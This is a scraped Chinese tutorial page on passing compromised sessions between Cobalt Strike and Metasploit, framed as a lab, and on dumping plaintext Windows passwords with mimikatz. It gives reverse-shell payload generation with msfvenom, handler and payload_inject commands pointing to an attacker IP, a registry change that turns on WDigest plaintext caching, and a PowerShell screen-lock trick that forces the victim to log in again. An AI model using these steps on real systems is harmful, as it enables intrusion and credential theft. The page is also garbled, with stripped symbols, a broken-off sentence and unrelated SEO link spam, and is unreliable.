当前位置: 首页 > news >正文

自己做网站要办手续吗网站怎么做筛选

自己做网站要办手续吗,网站怎么做筛选,中小型公司网络设计方案,深圳专业制作网站公司吗cs与msf权限传递#xff0c;以及mimikatz抓取win10明文密码 1、环境准备2、Cobalt Strike ------ MSF2.1 Cobalt Strike拿权限2.2 将CS权限传递给msf 3、MSF ------ Cobalt Strike3.1 msf拿权限3.2 将msf权限传递给CS 4、使用mimikatz抓取明文密码 1、环境准备 攻击以及mimikatz抓取win10明文密码 1、环境准备2、Cobalt Strike ------ MSF2.1 Cobalt Strike拿权限2.2 将CS权限传递给msf 3、MSF ------ Cobalt Strike3.1 msf拿权限3.2 将msf权限传递给CS 4、使用mimikatz抓取明文密码 1、环境准备 攻击【kali cs服务端192.168.111.129】、【win11 cs客户端192.168.111.145】 靶机windows 2012192.168.111.130 2、Cobalt Strike ------ MSF 2.1 Cobalt Strike拿权限 1、kali开启cs服务端 ┌──(root㉿kali)-[/home/kali/Desktop/cs_start] └─# ./teamserver 192.168.111.129 123452、window11开启cs客户端与服务端连接 3、建立监听器 4、生成木马 5、生成木马之后将生成的木马程序拖到window2012然后运行程序发现目标已经上线 6、上线之后就可以对目标主机的操控 成功拿下权限 2.2 将CS权限传递给msf 1、建立监听器 2、在kali打开msf开启msfconsole ┌──(root㉿kali)-[/home/kali] └─# msfconsole2、调用 exploit/multi/handler 模块将监听的ip地址与端口设置为在cs上建立监听保持一致。 msf6 use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_http payload windows/meterpreter/reverse_http msf6 exploit(multi/handler) set lhost 192.168.111.129 lhost 192.168.111.129 msf6 exploit(multi/handler) set lport 9999 lport 9999 msf6 exploit(multi/handler) exploit 3、然后进行传递 最后返回msf就可以看到传递成功了 最后由于 3、MSF ------ Cobalt Strike 3.1 msf拿权限 1、在msfvenom生成木马 msf6 msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST192.168.111.129 LPORT7777 -f exe msfshell.exe2、使用msfconsole启动MetasploitFramework设置meterpreter监听用于接收后门文件反弹到shell将生成的木马文件放置到win2012中。 msf6 use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_tcp payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) set lhost 192.168.111.129 lhost 192.168.111.129 msf6 exploit(multi/handler) set lport 7777 lport 7777 msf6 exploit(multi/handler) exploit 3、将获取到的会话挂至后台会看到一个会话sessions id meterpreter background [*] Backgrounding session 1...3.2 将msf权限传递给CS 1、在cs上新建监听器 2、调用 payload_inject 模块将指定会话session id注入到新到CobaltStrike会话中 msf6 exploit(windows/local/payload_inject) use exploit/windows/local/payload_inject [*] Using configured payload windows/meterpreter/reverse_http msf6 exploit(windows/local/payload_inject) set payload windows/meterpreter/reverse_http payload windows/meterpreter/reverse_http msf6 exploit(windows/local/payload_inject) set lhost 192.168.111.129 lhost 192.168.111.129 msf6 exploit(windows/local/payload_inject) set lhost 80 lhost 80 msf6 exploit(windows/local/payload_inject) set DisablePayloadHandler true DisablePayloadHandler true msf6 exploit(windows/local/payload_inject) set PrependMigrate true PrependMigrate true msf6 exploit(windows/local/payload_inject) set session 1 session 1 msf6 exploit(windows/local/payload_inject) exploit 上述步骤完成后在CobaltStrike中就可以看到MetasploitFramework传递过来到会话了 4、使用mimikatz抓取明文密码 1、抓取明文密码 2、抓取到的密码显示null这是由于Windows在win10或Windows2012R2以上时默认的缓存表中是不存在明文密码的显示为null 3、可以通过修改注册表来让Wdigest Auth保存明文口令shell reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 4、修改注册表之后需要用户重新登录才可以生效把如下代码保存为lock-screen.ps1 Function Lock-WorkStation {$signature [DllImport(user32.dll, SetLastError true)] public static extern bool LockWorkStation(); $LockWorkStation Add-Type -memberDefinition $signature -name Win32LockWorkStation -namespace Win32Functions -passthru $LockWorkStation::LockWorkStation() | Out-Null }Lock-WorkStation5、重新输入密码就可以获取明文密码
http://www.hkea.cn/news/14362518/

相关文章:

  • 中国建设银行网站股份结构变化襄阳建设网站公司
  • 分享一个网站能用的互站网
  • 随县网站建设做系统的网站好
  • 爱站网是什么商城小程序开发费用
  • 企业网站开发韵茵建站怎么样百度能搜到自己的网站
  • 网站开发公司基础产品深圳网络营销招聘
  • 江苏个人网站备案网站站点怎么做
  • 化妆品的网站设计方案微网站建设价格
  • 买域名建网站价格兰州网站seo哪家公司好
  • 山东省住房城乡建设厅查询网站首页wordpress中文免费主题下载
  • dw网站模板免费目前做win7系统最好的网站
  • 门户型网站有哪些网站建设公司代理
  • 排行网站模板长沙企业网站设计
  • 网站建设与管理 答案免备案虚拟主机哪家好
  • 广州好的网站设计公司汕头网站关键词推广
  • 青岛网站建设网站wordpress 建站五分钟
  • 公众号首图制作网站建筑类网站建设
  • 建设网站5要素cms网站访问人数
  • 有做兼职赚钱的网站吗个人网站建设咨询电话
  • 杨浦专业网站建设比特币网站建设
  • 超链接网站图片怎么在记事本上做门户网站建设摘要
  • 催收网站开发淘客网站怎么做代理
  • 网上申请个人营业执照网站wordpress 下载文件插件
  • 个人网站可以做企业宣传建设厅是做什么的
  • 株洲企业网站建设资源共享网站开发
  • 开发一个企业网站需要多少钱网页设计实训总结怎么写
  • 中山市城市建设档案馆网站单页营销型网站模板
  • 云营销网站建设电话咨询专业网站设计专业服务
  • 中山百度网站推广文化传媒有限公司网站建设
  • 网站建设与优化网站导航条和表格怎么做